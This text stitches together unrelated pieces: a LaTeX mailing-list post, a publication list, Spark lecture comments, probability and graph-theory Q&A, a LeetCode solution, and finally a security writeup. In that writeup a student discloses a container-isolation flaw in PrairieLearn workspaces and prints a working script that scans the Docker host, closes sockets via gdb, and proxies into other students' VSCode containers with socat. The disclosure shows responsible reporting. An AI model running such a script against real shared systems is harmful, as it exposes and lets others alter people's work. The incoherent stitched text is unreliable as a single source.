Christian sometimes like to be be abbreviated Chr.
and where do i put my qualifications?
\author{surname=Rahtz, forenames=Sebastian Patrick Quintus,title=Mr,
qualification="AJFL"} [2]
can that be done as ?
\author{name={Mr Sebastian Rahtz, AJFL}}
not easily, because you have to implement *masses* of bibtex functionality!
One approach would be to use BibTeX itself to do the parsing, if you
want something complicated - the production style could write the key
values out to a .bib file and call up BibTeX with a special
style. well, thats up to the implementor of the production class.
my (unhappy) proposal would be that we allow a full form, and a short
form. the `correct' form is to put:
\author{surname=Rahtz, forenames=Sebastian Patrick Quintus,title=Mr,
qualification="AJFL", initials=S.P.Q.} [2]
(incidentally, the Elsevier SGML DTD allows even more than this);
but in a simple case
\author{name=Sebastian Rahtz, AJFL}
will also work. then the production class has to do some hard work.
Sebastian
[1] just for those of you who ask me occasionally
[2] a prize if you can guess the meaning
```
|
## Publications:
Mistake Bounds for Binary Matrix Completion, M. Herbster, S. Pasteris, M. Pontil, NIPS 2016.
Online Prediction at the Limit of Zero Temperature, M. Herbster, S. Pasteris, S. Ghosh, NIPS 2015.
Online Similarity Prediction of Networked Data from Known and Unknown Graphs, C. Gentile, M. Herbster, S. Pasteris, COLT 2013. [paper]
Online Sum-Product Computation over Trees, M. Herbster, S. Pasteris, F. Vitale, NIPS 2012. [paper]
Efficient Prediction for Tree Markov Random Fields in a Streaming Model, M.Herbster, S. Pasteris, F. Vitale, NIPS Workshop on Discrete Optimization in Machine Learning (DISCML) 2011: Uncertainty, Generalization and Feedback. [paper]
A Triangle Inequality for p-Resistance , M. Herbster, Networks Across Disciplines: Theory and Applications : Workshop @ NIPS 2010. [paper]
Predicting the Labelling of a Graph via Minimum p-Seminorm Interpolation, M. Herbster and G. Lever, COLT 2009. [paper] [slides]1
Fast Prediction on a Tree, M. Herbster, M. Pontil, S. Rojas Galeano, NIPS 22, 2008. [paper] [slides]
Online Prediction on Large Diameter Graphs, M. Herbster, G. Lever, and M. Pontil, NIPS 22, 2008. [paper] [1-slide]
Exploiting cluster-structure to predict the labeling of a graph, M.Herbster, Proceedings of The 19th International Conference on Algorithmic Learning Theory (ALT'08), 2008. [paper] [slides]
A Linear Lower Bound for the Perceptron for Input Sets of Constant Cardinality, M. Herbster, Research Note, Dept. of Computer Science, UCL, March 2008. (Updated 18 May 08)
A fast method to predict the labeling of a tree S.R. Galeano, and M.Herbster, Graph Labeling Workshop (ECML-2007), 2007.
Prediction on a graph with a perceptron M. Herbster, and M. Pontil, NIPS 20, 2006.
Combining graph laplacians for semi--supervised learning A. Argyriou, M. Herbster, and M. Pontil, NIPS 19, 2005.
Online learning over graphs M. Herbster, M. Pontil, and L. Wainer, Proc. 22nd Int. Conf. Machine Learning (ICML'05), 2005. [paper] [slides]
Relative Loss Bounds and Polynomial-time Predictions for the K-LMS-NET Algorithm M. Herbster, Proceedings of The 15th International Conference on Algorithmic Learning Theory, October 2004.
An online algorithm is given whose hypothesis class is a union of parameterized kernel spaces, for example the set of spaces induced by Gaussian kernel when the width is varied. We give relative loss bounds and a tractable algorithm for specific kernels.
Relative loss bounds for predicting almost as well as any function in a union of Gaussian reproducing kernel spaces with varying widths M. Herbster, Poster at Mathematical Foundations Learning Theory, June 2004
Tracking the best linear predictor Mark Herbster and Manfred Warmuth, Journal of Machine Learning Research pp 281-309, September 2001.
We extend the results of "Tracking the best expert" (see below) to linear combinations.
Learning additive models online with fast evaluating kernels Mark Herbster, An abstract appeared in Proceedings 14th Annual Conference on Computational Learning Theory pp 444-460, July 2001.
Exponentially many local minima for single neurons Peter Auer, Mark Herbster and Manfred Warmuth, Neural Information Processing Systems 1996
We show that for a single neuron with the logistic function as the transfer function the number of local minima of the error function based on the square loss can grow exponentially in the dimension.
Tracking the best expert [Long Version] Mark Herbster and Manfred Warmuth, Machine Learning, Aug. 1998, vol.32, (no.2):151-78
We generalize the recent worst-case loss bounds for on-line algorithms where the additional loss of the algorithm on the whole sequence of examples over the loss of the best expert is bounded. The generalization allows the sequence to be partitioned into segments and the goal is to bound the additional loss of the algorithm over the sum of the losses of the best experts of each segment. This is to model situations in which the examples change and different experts are best for certain segments of the sequence of examples. In the single expert case the additional loss is proportional to $\log n$, where $n$ is the number of experts and the constant of proportionality depends on the loss function. When the number of segments is at most $k+1$ and the sequence of length $\ell$ then we can bound the additional loss of our algorithm over the best partitioning by $O(k \log n + k \log(\ell/k))$. Note that it takes the same order of bits to denote the sequence of experts and the boundaries of the segments. When the loss per trial is bounded by one then we obtain additional loss bounds that are independent of the length of the sequence. The bound becomes $O(k\log n+ k \log(L/k))$, where $L$ is the loss of the best partition into $k+1$ segments. Our algorithms for tracking the best expert are simple adaptations of Vovk's original algorithm for the single best expert case. These algorithms keep one weight per expert and spend $O(1)$ time per weight in each trial.
RNA Modeling Using Gibbs Sampling and Stochastic Context Free Grammars, Leslie Grate, Mark Herbster, Richard Hughey, David Haussler I. Saira Mian, and Harry Noller, Proceedings of Intelligent Systems in Molecular Biology 1994
A new method of discovering the common secondary structure of a family of homologous RNA sequences using Gibbs sampling and stochastic context-free grammars is proposed. Given an unaligned set of sequences, a Gibbs sampling step simultaneously estimates the secondary structure of each sequence and a set of statistical parameters describing the common secondary structure of the set as a whole. These parameters describe a statistical model of the family. After the Gibbs sampling has produced a crude statistical model for the family, this model is translated into a stochastic context-free grammar, which is then refined by an Expectation Maximization (EM) procedure to produce a more complete model. A prototype implementation of the method is tested on tRNA, pieces of 16S rRNA and on U5 snRNA with good results.
1. Sparsity in Machine Learning and Statistics Workshop @ Cumberland Lodge, April 1-3, 2009"
maintained by Mark Herbster / [email protected]
|
Previous | Next --- Slide 25 of 44
Back to Lecture Thumbnails
misaka-10032
RDD is not like array. Arrays are solid chunks of memory for data. However, for RDD we don't allocate memory for each of them; a lot of intermediate memory can be saved in a lineage. For example, here lines is immediately consumed by lower and no longer used, so in RDD we don't allocate memory for both of them. Rather, we only need to record the dependency, and allocate when necessary.
kayvonf
Question: Describe the abstraction presented by an RDD. Also, how are RDD's implemented by the Spark runtime?
Another question: What does it mean for an RDD to be materialized?)
monkeyking
As misaka-10032 said, we don't allocate memory for an RDD. So I think an RDD to be materialized means we allocate memory for it. That is, we store it into memory (.persist()) or even store it into durable storage (.persist(RELIABLE)).
xiaoguaz
@monkeyking I think persist() is not a method to materialize RDD, instead, it means spark will store its answer once it is calculated (just like cache()). As for materializing a RDD, I think it means to do the action on RDDs, such as count, collect, reduce and so on. Spark is lazy so it will do nothing until it meets these actions to materializing RDDs.
418_touhenying
Does materialized mean something like unpacked so that the data is ready for use?
althalus
From what I read, RDD is a fault-tolerant collection of elements that can be operated on in parallel. They are created by calling the parallelize() function on a dataset which copies the elements in the dataset to form a distributed dataset that can be operated on in parallel.
Also, I think that an RDD can materialized in memory by caching it since the cache remembers the RDD's lineage.
PandaX
RDD is like the 'formula' for generating data. We combine several RDDs to produce the result. The intermediate memory is saved.
Lotusword
RDDs do not need to be materialized at all times, as an RDD has enough information about how it was derived from other datasets(its lineage) to compute its partitions from data in stable storage.
Araina
I think persist() is a method to materialize RDD. However, since Spark is lazy, we need to do some action to this RDD after we use persist() on it. eg. var materialized = rdd.persist(); materialized.count(); After these two steps, this rdd is materialized.
momoda
When the RDD is persist(), if RDD fits into memory, then it will be stored in memory only, otherwise, stores in memory and disk.
yangwu
operations like cache(), persist() only mark RDD but not materialize them; on the other hand, operations like count() materialize RDD;
and I think "materialize" RDD means execute RDD dependencies and do the actual calculations
rajul
Sparks runtime does lazy evaluation so until an action is taken the RDD is not materialized.
|
# How does a function acting on a random variable change the probability density function of that random variable?
Given a random variable $X$ with probability density function $P(X)$, and given a transformation function $f(x)$, how does one determine the new resultant probability density function: $P(f(X))$?
For example:
Given random variable $X$ which is evenly distributed over the range $[0,2\pi ]$ such that $P(X) = \dfrac{1}{(2\pi)}$, what would be the probability density function of random variable $Y$ where $Y = \sin(X)$?
This blog post, explains how to get the pdf for $\sin(X)$, but I'd like to know if there is a way to solve this problem in the general case for a transformation of $f(X)$.
-
## 1 Answer
As usual, see also here, one can fix a bounded measurable function $\varphi$ and consider $$(*)=\mathrm E(\varphi(Y))=\mathrm E(\varphi(\sin X)).$$ By definition of the distribution of $X$, $$(*)=\int_0^{2\pi}\varphi(\sin x)\frac{\mathrm dx}{2\pi}=\int_{-\pi/2}^{\pi/2}\varphi(\sin x)\frac{\mathrm dx}\pi.$$ The change of variable $y=\sin x$ yields $-1\leqslant y\leqslant1$ and $\mathrm dy=\cos x\mathrm dx=\sqrt{1-y^2}\mathrm dx$, hence $$(*)=\int_{-1}^{1}\varphi(y)\frac{\mathrm dy}{\pi\sqrt{1-y^2}}.$$ This relation holds for every bounded measurable function $\varphi$ hence the distribution of $Y$ is the so-called arcsine distribution, with density $$f_Y(y)=\frac{[|y|\lt1]}{\pi\sqrt{1-y^2}}.$$
-
Hi Didier! What I don't understand in this derivation (and in the one before) is why you need the detour over the expectation? Can't you simply make of change of variables of the density as you do anyway? – fabee Mar 9 '12 at 9:00
You can. But some people feel the derivation is more transparent and less error-prone when using what you call a detour, which I call a systematic approach. The advantages of said approach are especially striking, though, when one computes the density of a function of several random variables. – Did Mar 9 '12 at 9:05
Thanks for the answer, but I still don't get it. I didn't mean any offense by detour, but I just don't get why it is necessary. What is more systematic about it than simply computing the determinant of the Jacobian (the absolute value of it) after making sure that your transformation is invertible? In short, assuming you have a density and an invertible transformation, I don't see why the expectation is necessary. – fabee Mar 9 '12 at 12:10
You said it yourself: the transformation might not be invertible (the one in this question is not) and the resulting random variable might not have a density. Hence one can use the functional approach in a wider context. But, once again, the specific question here may be solved by other means. – Did Mar 9 '12 at 15:38
Ok, then I think I got it. Thanks. – fabee Mar 9 '12 at 16:29
|
# Help with Bayes Thereom
• March 7th 2012, 05:49 PM
kangta27
Help with Bayes Thereom
You are given:
(i.) 0.30 = P (B|A) and ).40 = P(A|B)
(ii.) 0.25 = P((AuB)')
Determine P (AnB)
• March 7th 2012, 07:27 PM
Soroban
Re: Help with Bayes Thereom
Hello, kangta27!
I found a roundabout solution . . .
Quote:
$\text{Given: }\:\begin{Bmatrix} P(B|A) &=& 0.30 & [1] \\ P(A|B) &=& 0.40 & [2] \\ P((A\cup B)') &=& 0.25 & [3]\end{Bmatrix}$
$\text{Determine }P(A\cap B)$
$\text{From [1]: }\:P(B|A) \:=\:\dfrac{P(A\cap B)}{P(A)} \:=\:0.30 \quad\Rightarrow\quad P(A \cap B) \:=\:0.30P(A)\;\;[4]$
$\text{From [2]: }\:P(A|B) \:=\:\dfrac{P(A\cap B)}{P(B)} \:=\:0.40 \quad\Rightarrow\quad P(A\cap B) \:=\:0.40P(B)\;\;[5]$
$\text{Equate [5] and [4]: }\:0.40P(B) \:=\:0.30P(A) \quad\Rightarrow\qiad P(B) \:=\:0.75P(A)\;\;[6]$
$\text{From [3]: }\:P(A \cup B) \:=\:0.75$
$\text{Theorem: }\:P(A \cup B) \;=\; P(A) + P(B) - P(A \cap B)$
$\text{We have: }\qquad0.75 \;=\;P(A) + \underbrace{0.75P(A)}_{[6]} - \underbrace{0.30P(A)}_{[4]}$
. . . . . . . . . . $0.75 \;=\;1.45P(A)$
. . . . . . . . . $P(A) \;=\;\dfrac{0.75}{1.45} \;=\;\dfrac{15}{29}$
$\text{From [4]: }\:P(A \cap B) \:=\:\frac{3}{10}\cdot\frac{15}{29} \:=\:\frac{9}{58}$
|
# Estimating Certain Integral Probability Metric (IPM) is as Hard as Estimating under the IPM
2 Nov 2019Tengyuan Liang
We study the minimax optimal rates for estimating a range of Integral Probability Metrics (IPMs) between two unknown probability measures, based on $n$ independent samples from them. Curiously, we show that estimating the IPM itself between probability measures, is not significantly easier than estimating the probability measures under the IPM... (read more)
PDF Abstract
# Code Add Remove
No code implementations yet. Submit your code now
|
Formatted question description: https://leetcode.ca/all/1652.html
# 1652. Defuse the Bomb
Easy
## Description
You have a bomb to defuse, and your time is running out! Your informer will provide you with a circular array code of length of n and a key k.
To decrypt the code, you must replace every number. All the numbers are replaced simultaneously.
• If k > 0, replace the i-th number with the sum of the next k numbers.
• If k < 0, replace the i-th number with the sum of the previous k numbers.
• If k == 0, replace the i-th number with 0.
As code is circular, the next element of code[n-1] is code[0], and the previous element of code[0] is code[n-1].
Given the circular array code and an integer key k, return the decrypted code to defuse the bomb!
Example 1:
Input: code = [5,7,1,4], k = 3
Output: [12,10,16,13]
Explanation: Each number is replaced by the sum of the next 3 numbers. The decrypted code is [7+1+4, 1+4+5, 4+5+7, 5+7+1]. Notice that the numbers wrap around.
Example 2:
Input: code = [1,2,3,4], k = 0
Output: [0,0,0,0]
Explanation: When k is zero, the numbers are replaced by 0.
Example 3:
Input: code = [2,4,9,3], k = -2
Output: [12,5,6,13]
Explanation: The decrypted code is [3+9, 2+3, 4+2, 9+4]. Notice that the numbers wrap around again. If k is negative, the sum is of the previous numbers.
Constraints:
• n == code.length
• 1 <= n <= 100
• 1 <= code[i] <= 100
• -(n - 1) <= k <= n - 1
## Solution
First, obtain code’s length. Then, if k == 0, return an array of all zeros with code’s length. Otherwise, calculate each element in the decrypted array and return the decrypted array.
class Solution {
public int[] decrypt(int[] code, int k) {
int length = code.length;
int[] decrypted = new int[length];
if (k == 0)
return decrypted;
for (int i = 0; i < length; i++)
decrypted[i] = getSum(code, i, k);
return decrypted;
}
public int getSum(int[] code, int index, int k) {
int sum = 0;
int length = code.length;
int direction = k > 0 ? 1 : -1;
k = Math.abs(k);
for (int i = 1; i <= k; i++) {
int curIndex = (index + i * direction) % length;
if (curIndex < 0)
curIndex += length;
sum += code[curIndex];
}
return sum;
}
}
|
# Prove that every subgraph of forest has at least one vertex of degree < 2
So I know that a forest is a graph that has no cycles. This is what I had in mind:
Assume that we have the subgraph T, which has two options: to be connected or not. if it's connected it has to be a tree and a tree has to have a leaf (should i prove that? i'm not sure how) if it's not connected, then at least one vertex isn't connected to any other vertex which means it's of degree 0.
That's the basic idea... I need some elaboration.
• Not connected $\not \Rightarrow$ Has isolated vertex Jun 12, 2014 at 12:33
• A disconnected subgraph of a forest is itself a forest. It does not necessarily have an isolated vertex. But a forest always has a subgraph that is a tree. So the case of a disconnected subgraph can be reduced to the first case (tree). And yes, you have to prove that every tree has a leaf, unless the context of the problem implies that you can use it as a known result. But then there is hardly anything to prove. Jun 12, 2014 at 12:35
• Thanks for you comment! So basically I can say that in the case of a disconnected subgraph we can also divide it into 2 cases: connected and then it's a tree or disconnected again and we subgraph it until there are no more options. Can you help me with prooving the fact that a tree has to have a leave? thanks Jun 12, 2014 at 12:44
• "... in the case of a disconnected subgraph we can also divide it into 2 cases: connected and ...". Read that again, it makes no sense. If the case is that of a disconnected subgraph, how can it be connected at the same time?! And you don't need to keep dividing it until you reach a connected subgraph. Just consider the connected subgraph directly. Jun 12, 2014 at 12:47
• but every disconnected subgraph has a connected component, which is what i was referring to... Jun 12, 2014 at 12:51
Suppose every vertex of T has degree at least 2. Start with a vertex $v_1$ in T. Follow one of the edges from $v_1$ to reach another vertex $v_2$. Each time you reach $v_i$ from $v_{i-1}$, choose $v_{i+1}$ as one of the neighbors of $v_i$ other than $v_{i-1}$. (can always do this since $v_i$ has degree >= 2). In this way we get a sequence $v_1, v_2, v_3, ... v_k, ...$. Since T has finitely many vertices, say n, there must be a repeated value in $v_1, v_2, v_3, ... v_{n+1}$. Suppose $v_i = v_j$, with i < j. Then $v_i, v_{i+1}, ... v_j$ forms a cycle, which should not happen as T is a subgraph of a forest.
|
# Classical Analysis and Oden – Can time-scale computing be used to derive a contrary set of discrete-time dynamic systems directly from continuous-time dynamic systems?
From what I have read from the timescale, most results of continuous time and discrete time systems can be generalized to arbitrary timescales by considering the generalized derivative operator instead of the forward difference operator or the standard derivative. In particular, the concepts of the time scale can be applied to the literature of control theory and to linear matrix inequalities to address discrete and continuous systems through a unified approach.
I was wondering if, instead of using the generalized derivative operator, one would use a generalized formula for the simultaneous treatment of both continuous and discrete time. Instead, one could instead use a heuristic to derive the equations associated with a time-discrete result by directly perturbing the equations associated with the continuous-time counterpart.
example:
To let $$M prec 0$$ call that $$M$$ is a symmetrically negatively defined matrix and $$Delta$$ the generalized derivative operator. Suppose that $$mathbb {T}$$ is a top unlimited time scale with limited grain size and associated step size, which is given by $$mu$$,
in the [1] it is proved that there is a symmetrically positive defined matrix $$P$$ satisfying
$$tag {1} label {1} A ^ T (t) P + PA (t) + mu (t) A ^ T (t) PA (t) prec 0$$
for all $$t$$ in the time scale $$mathbb {T}$$, then $$x = 0$$ is an asymptotic stable equilibrium point of the dynamic linear system $$x ^ { Delta} = A (t) x$$,
Is there a known heuristic that "guesses" eqref {1} by only recognizing the continuous time?
Lyapunov equation is $$A ^ T (t) P + PA (t) prec 0$$?
[1]: Davis, John M. et al. "Algebraic and dynamic Lyapunov equations on time scales." 42. Southeastern Symposium on Systems Theory (SSST). IEEE, 2010.
|
CTF Team at the University of British Columbia
# [Special: Bug Hunting] Labs & Dockers! (PrairieLearn)
25 Sep 2022 by - desp
With enough determination, anything can be a CTF challenge :)
Note: this writeup’s focus is closer to pentesting than the CTF challenges that we typically do
## Vulnerability Disclosure Timeline
11/09/2022 3PM
Issue found with workspace container network isolation in a CPSC course
11/09/2022 8PM
Weaponized issue to access other active containers along with the workspace interface server, reported to the course's teaching team
12/09/2022 9AM
Response received: not much they can do since it seems to be a PrairieLearn-wide issue
21/09/2022 4PM
Brought the issue up again in a TA meeting of a related course that also utilizes workspaces, instructor in charge requested a formal report
22/09/2022 12AM
Report drafted and sent
22/09/2022 10AM
22/09/2022 3PM
Further information regarding invigilation security requested, escalated to PrairieLearn maintainers
22/09/2022 7PM
Further report drafted and sent, got in touch with PrairieLearn maintainers
23/09/2022 10AM
Cause identified and preliminary patch has been made
23/09/2022 12PM
Preliminary patch deployed but rollback necessary due to major regression (workspace outage)
23/09/2022 3PM
Regression identified, patch reviewed and deployed again
23/09/2022 4PM
Vulnerability has been verified fixed
Thanks to the UBC CS department and the PrairieLearn team for the swift actions!
# Part 1: Discovery
## The things you do when you are bored
So the story goes back to my first lab in the course - I finished earlier than I expected, but I didn’t have the motivation to start another assignment. So, just like everyone would do when they are bored, I went on youtube like a sane person started poking around in the PrairieLearn workspace given and see if anything funny happens!
For context, PrairieLearn is the platform most CPSC courses in UBC use for basically everything involving grades - assignments, labs, exams… if you can name it, it’s probably on PrairieLearn. And PrairieLearn workspaces is a pretty new feature that aims to alleviate setup pain and prevent some of the bring-your-own-device issues by giving everyone a web frontend to a full fledged linux instance on request, bound to the assignment they are working on.
Some of you might already be able to guess how this is done (it’s in the writeup title after all) - that’s right, it’s automatically provisioned docker instances. PrairieLearn helpfully provided all the source you need to understand how it’s done, but we will get back to that in a bit. Now, you might be wondering “aren’t docker containers pretty secure?”, and to that I’ll answer yes, but while machines don’t (usually) make mistakes, us humans do all the time.
With this in mind, I set out to try some of the most common misconfigurations that could’ve resulted in docker escapes. While I realized I was able to do random things like circumvent their file isolation using base64 copy and pasting, along with trivially escalating to root (which I realized is by design later), everything seems to be robust enough to withstand known container escape techniques. That is until I tried snooping around on the host:
# ./nc -zv -w 1 172.19.0.1 1-65535
172.19.0.1: inverse host lookup failed: Host name lookup failure
(UNKNOWN) [172.19.0.1] 43505 (?) open
(UNKNOWN) [172.19.0.1] 35083 (?) open
(UNKNOWN) [172.19.0.1] 28400 (?) open
(UNKNOWN) [172.19.0.1] 25067 (?) open
(UNKNOWN) [172.19.0.1] 22315 (?) open
(UNKNOWN) [172.19.0.1] 9402 (?) open
(UNKNOWN) [172.19.0.1] 8081 (tproxy) open
(UNKNOWN) [172.19.0.1] 7335 (?) open
(UNKNOWN) [172.19.0.1] 111 (sunrpc) open
(UNKNOWN) [172.19.0.1] 22 (ssh) open
Wait - huh? I wasn’t expecting to be able to see any open ports at all, since it’s the docker host IP. After testing connections to the ports, I’ve realized that I was actually able to communicate with the host:
• 22 is actually an SSH port
• 111 seems to be an RPC port of sorts (maybe for NFS?)
• 8081 gives me an Express.js not found error no matter what common page requests I give
• Rest of the ports other than 111 gave me an html page with references to VSCode on a curl GET request, which ended up being the VSCode server’s frontend page
Incidentally, all of the workspace instances are hosting VSCode servers for us to code on - doesn’t this mean I can connect to other workspaces?
## Why code a client when you can reuse one
Ok, we can connect to other workspaces, but that doesn’t help much - the VSCode server used has a lot of bells and whistles that curl just won’t cut it (or at least I’d go insane before i can issue that many commands to do anything useful). Also, since the container is cut off from the outside internet, the only access we can go through is the PrairieLearn proxied frontend we were given - but that only listens to our own container and nothing else.
Is this where we give up and go home then? Nope, it just means that we need to trick our container into redirecting the frontend connection to the other workspaces! This proves to be harder than I initially thought - in fact coding the weaponized script took more than 5 times the time I used to find the misconfiguration in the first place. This was mainly because of the following requirements:
• We need a way to reliably obtain open VSCode ports
• We need a way to replace the node server that is running our VSCode instance with a proxy to listen on the same port, while not killing it
• The frontend only listens to the forwarded VSCode port (8080), so we cannot use another port and expect the frontend to be able to connect to it
• Killing the node server would crash the workspace, since dumb-init dies if the child process dies
• We cannot listen to the same port with 2 processes, which means we need a way to detach from a port without killing the process
• We need to gracefully reset the frontend connection and reconnect to the new proxy after the proxy has been set up
The following command gives a pretty good visualization how our processes are set up in the container:
$pstree -a sh /usr/bin/entrypoint.sh --bind-addr 0.0.0.0:8080 . --auth none └─dumb-init /usr/bin/entrypoint-helper.sh --bind-addr 0.0.0.0:8080 . --auth none └─sh /usr/bin/entrypoint-helper.sh --bind-addr 0.0.0.0:8080 . --auth none └─node /usr/lib/code-server --auth none --bind-addr 0.0.0.0:8080 . --auth none ├─node /usr/lib/code-server --auth none --bind-addr 0.0.0.0:8080 . --auth none │ ├─node /usr/lib/code-server/lib/vscode/out/vs/server/fork │ │ ├─node /usr/lib/code-server/lib/vscode/out/bootstrap-fork --type=watcherService │ │ │ └─10*[{node}] │ │ ├─node /usr/lib/code-server/lib/vscode/out/bootstrap-fork --type=extensionHost │ │ │ ├─bash │ │ │ │ └─pstree -a │ │ │ └─16*[{node}] │ │ └─11*[{node}] │ └─10*[{node}] └─10*[{node}] With that in mind, after a bit of brain racking and trial and error, I eventually figured out a series of tricks to solve all of them: • We can port scan the host to obtain open ports with netcat (and more reliably the status page as found out in the next section) • We can utilize gdb to invoke close(fd) on the socket descriptor for the port obtained through lsof to gracefully close the connection without terminating the server • Start socat for the proxying, replacing the node instance • Suspend only the node process that our connection is established to, and force a timeout so the frontend reconnects • Automate all of these to not need manual input since manual input is unstable during this transition And here are all the tricks formalized into a script: #obtain the PIDS that represents our own VSCode instances that are listening to our PrairieLearn frontend PIDS=$(./netstat -tuplen | grep '8080.*' | grep -oh '[0-9]*/node' | grep -oh '[0-9]*' | sort | uniq)
#find other VSCode instances by either port scanning our host or getting the ports from status page to connect to (selected on random)
#PORT=$(./nc -zvn -w 1 172.19.0.1 8082-65535 2>&1 | grep -oh ' [0-9]* ' | sed -r "s/ ([0-9]*) /\1/g" | head -n 1) PORT=$(curl http://172.19.0.1:8081/status 2>&1 | grep -oh 'PublicPort":[0-9]*' | grep -oh '[0-9]*' | shuf | head -n 1)
echo port: $PORT #detach our VSCode instances from the port by calling close() on the respective descriptors from lsof IFS=$'\n'
for PID in $PIDS do eval gdb -batch$(./lsof -np $PID | grep -P '(LISTEN)' | grep -oh '[0-9]*u' | grep -oh '[0-9]*' | sed -zr 's/([0-9]*)+\n/-ex "call close(\1)" /g') -ex 'quit' -p$PID
done
#start proxying, listening on the same port redirecting to the port of the other instance we found
./socat tcp-l:8080,fork,reuseaddr tcp:172.19.0.1:$PORT & ./socat tcp:$(cat /etc/hosts | grep '172' | grep -oh '^.*\s' | sed "s/\s//g"):8080,fork,reuseaddr tcp:172.19.0.1:$PORT & PIDS=$(./netstat -tuplena | grep '8080.*' | grep -oh '[0-9]*/node' | grep -oh '[0-9]*' | sort | uniq)
#debug
for PID in $PIDS do echo$PID
done
#pause our own VSCode instance to reset the connection from the frontend
PID=$(echo$PIDS | grep -oh '[0-9]*$') #get last pid, likely with the connection we need to terminate echo pid:$PID
kill -STOP \$PID
All that’s left is to try running this script now:
Then all we need to do is wait, click reload window, and voila! We have switched into a random workspace through its VSCode instance. Or as they say, ahem, in hacker voice: “I’m in.”
(sorry random classmate for using your codes as an example 😅)
All the fun stuff you expect to work works just like usual - the commands work, you can open and edit any of the files, or even delete everything and leave a note saying haha pwned 🥴 (please don’t)
In all seriousness though, this means that an adversary can modify gradable files and sabotage other people’s work - from copying other classmates’ codes covertly to finish your own assignment, to erasing all their progress, or even fake academic misconduct events by copying one student’s codes to another student’s workspace, all kinds of chaos ensue from this. Definitely not a good thing for academic integrity.
## What about the other ports?
Now that we were able to weaponize connecting to other containers with our own frontend, it’s time to investigate the other ports. The SSH server seems very secure after investigating, so I gave up on that almost instantly; I couldn’t get the RPC port to give me any useful information either. But we still have port 8081 that just always errors:
# curl -vvv http://172.19.0.1:8081
* Expire in 0 ms for 6 (transfer 0x55f6677e4f50)
* Trying 172.19.0.1...
* TCP_NODELAY set
* Expire in 200 ms for 4 (transfer 0x55f6677e4f50)
* Connected to 172.19.0.1 (172.19.0.1) port 8081 (#0)
> GET / HTTP/1.1
> Host: 172.19.0.1:8081
> User-Agent: curl/7.64.0
> Accept: */*
>
< X-Powered-By: Express
< Content-Security-Policy: default-src 'none'
< X-Content-Type-Options: nosniff
< Content-Type: text/html; charset=utf-8
< Content-Length: 139
< Date: Sun, 11 Sep 2022 22:06:52 GMT
< Connection: keep-alive
< Keep-Alive: timeout=5
<
<!DOCTYPE html>
<html lang="en">
<meta charset="utf-8">
<title>Error</title>
<body>
<pre>Cannot GET /</pre>
</body>
</html>
* Connection #0 to host 172.19.0.1 left intact
Then it dawned upon me - didn’t I say PrairieLearn is open source? Upon searching what port 8081 might be on the PrairieLearn github, I realized it was actually the workspace interface server - remember the source I linked in the introduction? Turns out that is exactly the server I was pinging, and the source code detailed how to interact with their API - which means it’s time to try a curl http://172.19.0.1:8081/status:
{"docker":[{"Id":"c2eb729a4c4ee33f00be9e0fa540a6d2fb14523093e8265bf9af07b727814444","Names":["/workspace-8f2399ac-0604-4fe0-9dce-18b2bbd39c1d"],"Image":"[REDACTED]/workspace:1.1.2","ImageID":"sha256:[REDACTED]","Command":"/usr/bin/env sh /usr/bin/entrypoint.sh --bind-addr 0.0.0.0:8080 . --auth none","Created":1662956312,"Ports":[{"IP":"0.0.0.0","PrivatePort":8080,"PublicPort":5658,"Type":"tcp"},{"IP":"::","PrivatePort":8080,"PublicPort":5658,"Type":"tcp"}],"Labels":{},"State":"running","Status":"Up 35 seconds","HostConfig":{"NetworkMode":"no-internet"},"NetworkSettings":{"Networks":{"no-internet":{"IPAMConfig":null,"Links":null,"Aliases":null,"NetworkID":"[REDACTED]","EndpointID":"[REDACTED]","Gateway":"172.19.0.1","IPAddress":"172.19.0.3","IPPrefixLen":16,"IPv6Gateway":"","GlobalIPv6Address":"","GlobalIPv6PrefixLen":0,"MacAddress":"[REDACTED]","DriverOpts":null}}},"Mounts":[{"Type":"bind","Source":"[REDACTED]","Destination":"/home/coder","Mode":"","RW":true,"Propagation":"rprivate"}]}, (...) ],"postgres":"ok"}
Oh boy, that’s a lot of sensitive information - I didn’t even have to authenticate in any way. While that saves us a lot of guessing pain, it doesn’t give us more attack vectors; but that’s not the case when it comes to the other endpoints. They likely allow adversaries to create or reset workspace instances whenever they want, which makes DoSing trivial; not to mention the interface server as a whole being accessible also exposes the possibility of escalation to host if there exists any vulnerabilities in the server itself.
I eventually also figured out that you can just connect to the private ports of the other containers from our own container directly, and proxying will work the same. Looking at the codes and entrypoint commands run in the container, we can see why:
• For the interface server, server.listen() was only called with a port, which means it falls back to the default host of 0.0.0.0
• For the VSCode instances, --bind-addr is bound to 0.0.0.0:8080 as visible in pstree -a output above; the public port assigned is also bound to "IP":"0.0.0.0" as shown in the status page response above
Since 0.0.0.0 is accessible from anywhere if there is no infra-side access rules preventing it (e.g. iptables filters), it makes sense both container-to-container communication and access through host was possible.
It also seems like this issue should be present in all of the courses that uses workspaces - The listening addresses and how workspace instances are made are all automated using the same codes after all. Time to report all these to the profs…
# Part 2: Reporting
## How to feel like a bug hunter
I initially contacted the teaching team of the course but they don’t seem to be able to do much - though they did mention they will think of something to do about this. Fast forward a week or so, and we were talking about some other PrairieLearn issues in the course I’m TAing this term - which suddenly reminded me of this issue.
Seeing that I still haven’t received much news yet, I figured I might as well just bring it up in the meeting too since we will also be using workspaces in some future assignments - this time, however, the instructor in charge got much more alarmed. As the meeting was about to end, he requested me to write a formal report and email it to him so he can determine how serious it is, which I did that evening. While doing that, I also made a rough and ugly diagram to illustrate how the issue i found works:
The next morning, I received a request for information embargoing on this issue - it has now been considered a vulnerability, and is being escalated to the department heads to figure out what to do with this. I then received inquiries about how this might impact academic integrity, especially in the context of exams if left unfixed - which I drafted another thousand-word email in answer to.
While writing that I also realized how the vulnerability is more serious than I initially thought if workspaces were used in exams: Since the workspace host is shared across the entire course regardless of assignment types, this means that a student might be able to ask/pay another student in the course that is not taking the exam at the same time as them to work on their exam - they will just have to figure out how to identify the workspace instance beforehand, have the student that is not taking the exam fire up an assignment with workspaces while the other student is taking the exam, proxy into workspaces until they reach the right one, and work on it from outside the invigilation room, ensuring completely covertness since if invigilators aren’t focusing on the student the entire time it looks basically like they are coding it themselves. Poof! We have academic integrity blown to smithereens. And that’s exactly what we don’t want.
Eventually, it was escalated to the PrairieLearn maintainers themselves, and I was invited to work with them on resolving this vulnerability. After a slight mishap while patching which basically took the entire workspace docker network down, we were able to get an infra-side patch deployed correctly, and I was able to verify that the vulnerable endpoints no longer responded to me. With this, the saga has finally come to an end - and everyone lived happily after.
That is I guess everyone aside from these classmates - oopsies! I’m sorry 😢
# Thoughts
